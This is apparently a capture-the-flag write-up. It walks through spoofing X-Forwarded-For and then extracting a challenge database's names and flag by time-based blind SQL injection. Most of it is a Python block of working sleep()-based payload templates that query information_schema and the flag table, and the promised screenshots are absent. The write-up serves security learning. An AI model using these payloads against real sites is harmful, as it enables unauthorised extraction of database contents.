Open the link; the page shows the following:
Analysis: the first thing that comes to mind is that this is an IP-spoofing challenge, so we try the HTTP headers commonly used to spoof the client address (X-Forwarded-For and the like). In Burp the spoofing works, as shown below:
Response:
So the spoofing succeeds, but the SQL statement appears to be echoed back only as a string: there is no error and no visible difference in content to base a true/false decision on. What next?
Time-based blind injection?!
Use a `select case when() then ... end` expression so that a true condition calls `sleep()` and a false one returns immediately; the difference in response time then tells us the database name length, the database name, the table names, the column names and finally the flag. The blind-injection payloads are as follows:
```python
# Payload templates for the X-Forwarded-For header. `i` is the character
# position being probed, `j` the candidate character; each step of the
# extraction is uncommented in turn, and only the last one is active here.
# A guess of '' is the length probe: substring() past the end returns ''.

# length of database
# header = {"X-Forwarded-For": "'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i}

# name of database
# header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}

# length of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}

# name of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')"
#           " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}

# length of column
# header = {
#     "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') "
#     "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') "
#     "then sleep(6) else 0 end) and 'a'='a" % i}

# name of column
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')"
#           " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}

# length of flag
# header = {
#     "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
#     "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}

# name of flag
header = {
    "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
    "from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
```
The result is as follows: